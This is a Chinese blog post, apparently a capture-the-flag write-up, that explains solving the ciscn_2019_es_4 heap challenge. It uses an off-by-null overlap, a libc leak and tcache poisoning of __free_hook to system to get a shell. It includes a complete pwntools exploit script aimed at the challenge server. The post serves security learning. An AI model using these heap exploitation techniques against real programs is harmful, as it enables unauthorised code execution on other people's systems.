Buuctf :【ciscn_2019_es_4】

已于 2022-01-21 00:31:30 修改
阅读量1.9k 收藏 2
点赞数 3
分类专栏: buuctf刷题 文章标签: 安全 pwn linux
于 2022-01-21 00:31:01 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_51055545/article/details/122612849
版权

Buuctf :【ciscn_2019_es_4】

检查程序:
在这里插入图片描述
64位程序,没有开pie保护
漏洞分析:
在这里插入图片描述
edit()中存在of by null
利用思路:
1.堆风水构造overlap,指针残留,泄露出libc地址
2.再次堆布局,劫持free_hook,覆写为system
3.free掉’/bin/sh’的堆块,get shell

分析:

1.由于add()中限制了我们申请堆的大小,没法通过直接申请0x420的堆块泄露地址,所以要填满tcache bin,释放后进入unsorted bin中,有32次申请的次数
2.edit()有两次机会,一次用来泄露地址,一次用来劫持free_hook
3.show()函数要有key2才能正常show,所以要给key2赋任意值

exp分析:
先进行堆布局:

for i in range(7):
	add(i,0x80,'AAAA')

for i in range(7):
	add(i+7,0xf0,'AAAA')#13

#feng shui
add(14,0x80,'AAA')
add(15,0x98,'AAA')
add(16,0xf0,'AAA')
add(17,0x90,'AAA')

for i in range(7):
	free(i)

for i in range(7):
	free(i+7)

此时bin中:
在这里插入图片描述
释放14,16号堆块后就会进入unsorted bin中,利用of by null:

free(14)
edit(15,'A'*0x90 + p64(0x130))
free(16)#触发of by null

for i in range(7):
	add(i,0x80,'A')

free(15)
add(14,0xa0,'A'*0x80 + p64(0x90) + p64(0xa0) + p64(0x6022B8))#劫持到key2

在这里插入图片描述

连续申请两次,申请到key2

add(18,0x90,'A')
add(19,0x90,'A')#赋值

现在就可以正常使用show()了
残留指针,leak出Libc地址

add(20,0x80,'A')

show(20)
leak = u64(io.recvuntil('\x7f')[-6:].ljust(8,b'\x00'))
success(hex(leak))
libc_base = leak - 0x3ebc41
success(hex(libc_base))
free_hook = libc_base + libc.sym['__free_hook']
system = libc_base + libc.sym['system']
success(hex(free_hook))
success(hex(system))

再次堆风水,构造overlap,劫持到free_hook

add(21,0xe0,'/bin/sh\x00')
add(22,0x80,'AAAA')
add(23,0xb8,'AAAA')
for i in range(7):
	add(i+24,0xf0,'A')#30

add(31,0xf0,'A')
for i in range(7):
	free(i+24)

for i in range(7):
	free(i)

add(32,0xd0,'A')
free(22)

edit(23,'A'*0xb0 + p64(0x150))
free(31)
free(23)
free(14)
add(14,0xe0,'A'*0x80 + p64(0) + p64(0xc0) + p64(free_hook))

在这里插入图片描述
劫持到free_hook

add(2,0xb0,'A')
add(3,0xb0,p64(system))
free(21)#get shell

完整exp:

from pwn import *
elf = ELF('./ciscn_2019_es_4')
io = remote('node4.buuoj.cn',27943)
#io = process('./ciscn_2019_es_4')
#libc = elf.libc
libc = ELF('./libc-2.27.so')
context(log_level='debug')

def choice(c):
	io.recvuntil('w\n')
	io.sendline(str(c))

def add(index,size,content):
	choice(1)
	io.recvuntil(':')
	io.sendline(str(index))
	io.recvuntil(':')
	io.sendline(str(size))
	io.recvuntil(':')
	io.send(content)

def free(index):
	choice(2)
	io.recvuntil(':')
	io.sendline(str(index))

def edit(index,content):
	choice(3)
	io.recvuntil(':')
	io.sendline(str(index))
	io.recvuntil(':')
	io.send(content)

def show(index):
	choice(4)
	io.recvuntil(':')
	io.sendline(str(index))

key2 = 0x6022B8

for i in range(7):
	add(i,0x80,'AAAA')

for i in range(7):
	add(i+7,0xf0,'AAAA')#13

#feng shui
add(14,0x80,'AAA')
add(15,0x98,'AAA')
add(16,0xf0,'AAA')
add(17,0x90,'AAA')

for i in range(7):
	free(i)

for i in range(7):
	free(i+7)

free(14)

edit(15,'A'*0x90 + p64(0x130))

free(16)

for i in range(7):
	add(i,0x80,'A')

free(15)

add(14,0xa0,'A'*0x80 + p64(0x90) + p64(0xa0) + p64(0x6022B8))
add(18,0x90,'A')
add(19,0x90,'AAAAAAA')
add(20,0x80,'A')
show(20)
leak = u64(io.recvuntil('\x7f')[-6:].ljust(8,b'\x00'))
success(hex(leak))
libc_base = leak - 0x3ebc41
success(hex(libc_base))
free_hook = libc_base + libc.sym['__free_hook']
system = libc_base + libc.sym['system']
success(hex(free_hook))
success(hex(system))

add(21,0xe0,'/bin/sh\x00')
#feng shui
add(22,0x80,'AAAA')
add(23,0xb8,'AAAA')
for i in range(7):
	add(i+24,0xf0,'A')#30

add(31,0xf0,'A')
for i in range(7):
	free(i+24)

for i in range(7):
	free(i)

add(32,0xd0,'A')
free(22)
edit(23,'A'*0xb0 + p64(0x150))
free(31)
free(23)
free(14)
add(14,0xe0,'A'*0x80 + p64(0) + p64(0xc0) + p64(free_hook))

add(2,0xb0,'AA')
add(3,0xb0,p64(system))
free(21)
io.interactive()

在这里插入图片描述

[BUUCTF]-PWN:ciscn_2019_es_7解析(系统调用execve,srop)
2301_79326813的博客
01-30 540
这道题好像和buu的ciscn_2019_s_3是一模一样的看保护64位,没开canary和pie看ida题目还有能往rax传递0x3B和0xf的函数,这就提示我们可以用系统调用来getshell。
BUUCTF栈迁移ciscn_2019_es_2
Rt1Text的博客
04-09 1136
1.checksec+运行获取基本信息 32位+NX栈不可执行 2.常规IDA操作 1.main函数 并没有什么 2.int vul()函数 程序主体,信息很多 1.两次read都在往同一个地方s处读入数据 2.要读入0x30,但s大小只有0x28,如果有后门函数,直接常规栈溢出操作 但是shift+f12 这里仅仅是打印flag字符串,没有用 同时查看hack函数 system里面的参数不是bin_sh不能直接用,所以要修改system的参数 但是...
ciscn_2019_es_4
doudoudedi
04-08 442
思路 先unlink将地址key写好然后做一次off by one在tcache attack就行了 exp: #!/usr/bin/python2 from pwn import * #p=process('./ciscn_2019_es_4') p=remote('node3.buuoj.cn',25382) elf=ELF('./ciscn_2019_es_4') libc=elf.libc...
ciscn_2019_en_4
seaaseesa的博客
05-01 464
ciscn_2019_en_4 首先检查一下程序的保护机制 然后,我们用IDA分析一下,主函数里的功能通过对应index的虚表调用,虚表存在在里。 Edit功能存在下标溢出,因此可以向上溢出修改虚表指针。 Show功能同理存在溢出,可以读取原来的虚表地址,进而计算出程序的基址。 进而计算出指针存放的地址,我们将指针的地址-0x18作为虚表地址,这样,当我们再次调用功...
ciscn_2019_s_4
doudoudedi
01-26 1044
可以看到有栈溢出的漏洞能过控制执行流 exp: #!/usr/bin/python2 from pwn import * from LibcSearcher import * local=0 if local==1: p=process('./ciscn_s_4') elf=ELF('./ciscn_s_4') #libc=elf.libc else: p=remo...
buuctf ciscn_2019_s_4 pwn wp
weixin_44740530的博客
04-21 407
buuctf ciscn_2019_s_4 pwn wp https://www.jianshu.com/p/fabc34bafe18
CTF-PWN Noleak (unsortedbin attack+fastbin attack+malloc_hook)
SuperGate的博客
11-25 974
漏洞简述 [*] '/home/supergate/Desktop/Pwn/timu' Arch: amd64-64-little RELRO: Full RELRO Stack: Canary found NX: NX disabled PIE: No PIE (0x400000) RWX: Ha...
[BUUCTF]-PWN:ciscn_2019_es_1解析(tcachebin duf)
2301_79326813的博客
02-17 390
查看保护再查看ida大致为alloc创建块,free释放块,show输出块内容但是要注意一点free没有清空块指针。
BUUCTF-PWN刷题记录-5(Tcache)
weixin_44145820的博客
04-13 1582
目录ciscn_2019_final_3[V&N2020 公开赛]easyTHeap ciscn_2019_final_3 只有添加和删除两个功能 限制了申请的大小,最大为0x78,意味着chunk最大为0x80,添加完可以泄露上的地址 free之后没有置空,可以double free 题目分析差不多就这样,下面是漏洞利用: 先申请一个大小为0x78的heap[0],记录下返回地...
BUUCTF-PWN刷题记录-12
weixin_44145820的博客
04-23 831
ciscn_2019_sw_1 一道思路比较独特的格式化字符串漏洞题目 main函数中只有一次利用漏洞的机会 有system的got表项 一个可行思路是把printf的GOT改为system@plt,然后输入/bin/sh,但是考虑到只有一次机会就比较困难 所以我们需要一个能让main多次执行的办法 这时我们只要把main的地址填入finit_array就能无限循环main函数了 简单介绍一...
[pwn]风水排布-babyfengshui
热门推荐
Breeze的博客
12-31 1万+
[pwn]风水排布-babyfengshui 所谓风水也叫作排布,其实说严格了并不是一种漏洞的利用方法,而是一种灵活布置块来控制布局的方法,在一些一些其他漏洞的利用中起到效果。通过一道经典的题目,由清华蓝莲花战队出的babyfengshui来看一下: babyfengshui 查看安全策略 没开PIE,但值得一提的是这是一个32位的程序,32位的4字节对齐的。 查看程序逻辑 ...
羊年内核风水: “Big Kids’ Pool”中的喷技术
weixin_33955681的博客
03-08 768
Chuck · 2015/01/28 10:080x00 前言作者:Alex Lonescu题目:Sheep Year Kernel Heap Fengshui: Spraying in the Big Kids’ Pool地址: http://www.alex-ionescu.com/?p=231前几天看到Twitter上推荐的一篇Alex lonescu写的博文,是关于两个新的内核喷射技术的...
栈迁移图解
qq_40410406的博客
11-11 1704
栈迁移 场景 1 如果程序的保护措施canary开启,会在prev ebp栈空间的下一个低地址存放一个随机值,当我们溢出时会将这个随机值覆盖,程序检测到这个随机值发生变化以后会自动退出(崩溃),此时就无法进行栈溢出攻击,所以需要另寻出路。 2 栈溢出长度不足以使用直接 ROP 3 栈溢出 payload 会出现空字符截断,且gadget地址含有空字符 4 在泄露地址信息后需要新的 ROP payload 5 如果开启了栈不可执行保护,就需要栈迁移到bss段或者data段或者其他栈位置执行我们的gadge
[A]oooorder(orw)
qq_33590156的博客
08-04 210
这题是2.27GNU7.3(没有doublefree的check)下的setcontext绕过沙箱进行orw,算是一个学习题,总体思路就是拿到freehook后用setcontext+53(用frame进行设置)运行mprotect,之后shellcode调用read 和 jmp跳到shellcode执行orw。下面跟着脚本进行讲解。 漏洞点在realloc(ptr,size),如果size为0,他就会把这个chunk free掉。 from pwn import * context(os='linux',
BUUCTF ciscn_2019_c_1
红叶的博客
10-30 906
RELRO 是一种用于加强对 Binary 数据段的保护的技术。由 CPU 提供支持,在页表中有Non-executable flag, 来限制一块内存区域不可执行。IDA Pro中查看的大小有时候可能是错误的,大部分时间以gdb动态调试为准。把加密后的文本复制到新建文本文档中,查询RBP的前4个字符。远程调试使用 libc 0 ,本地调试使用 libc 1。64位ELF,开启了部分RELRO以及NX。32位和64位程序在函数调用的方式存在区别。不止这种方法可以获取大小,还有两种方法。84 - 4 即可。
CTF泄漏libc基址的方法
liucc09的博客
01-05 4323
泄漏libc 重点: glibc 的后三位是固定的 main_arena泄漏法 main_arena存储在libc.so.6文件的.data段,通过这个偏移我们就可以获取libc的基址,使用IDA打开libc文件,然后搜索函数malloc_trim() [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-a8DgTYcd-1609837106507)(D:\04_笔记\images\main_arena.png)] [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接
[V&N2020 公开赛]simpleHeap-记录一次gef调试过程
qq_40712959的博客
10-24 1022
[V&N2020 公开赛]simpleHeap 安全机制: IDA反汇编 main: Add: Edit: 可以看到get_input_content函数包含一个off_by_one漏洞。 Show: Delete 可以看到free函数之后,将chunkptr置为0,所以不存在UAF 思路: 利用off-by-one漏洞,篡改chunk的size大小,使被篡改大小的chunk覆盖其后已申请的chunk大小,从而导致chunk overlapping
【学习记录】使用 Kali Linux 与 Hashcat 进行 WiFi 安全分析:合法的安全测试指南
最新发布
行云流水剑的博客
06-09 696
本文介绍了如何使用 Kali Linux 和 Hashcat 对 WiFi 网络进行合法的安全测试。通过监听模式捕获 WPA/WPA2 握手包,并利用工具提取关键信息,将其转换为 Hashcat 支持的格式(模式 22000),最终结合字典或暴力破解方式尝试恢复 WiFi 密码。文章详细讲解了从环境搭建、无线网卡配置、握手包捕获到哈希破解的完整流程,并推荐了常用工具如 airmon-ng、airodump-ng、aireplay-ng 和 hashcat 的使用方法。
加密货币钱包开发指南:多链资产管理与非托管安全范式
Lovely_xwys的博客
06-06 1073
后端:Rust(高性能核心模块) + Go(跨链通信层);前端:React Native(跨平台兼容) + Web3.js(区块链交互);区块链适配:以太坊Solidity、Solana Anchor框架。
Elasticsearch日志渠道可视化新工具:elastic_funnel介绍
- **elasticsearch**: 强调了elastic_funnel工具与Elasticsearch的关联,它利用Elasticsearch作为数据源。 - **kibana**: Kibana是与Elasticsearch紧密集成的分析和可视化平台,虽然标题中未提及,但标签中出现可能...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Leee333

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值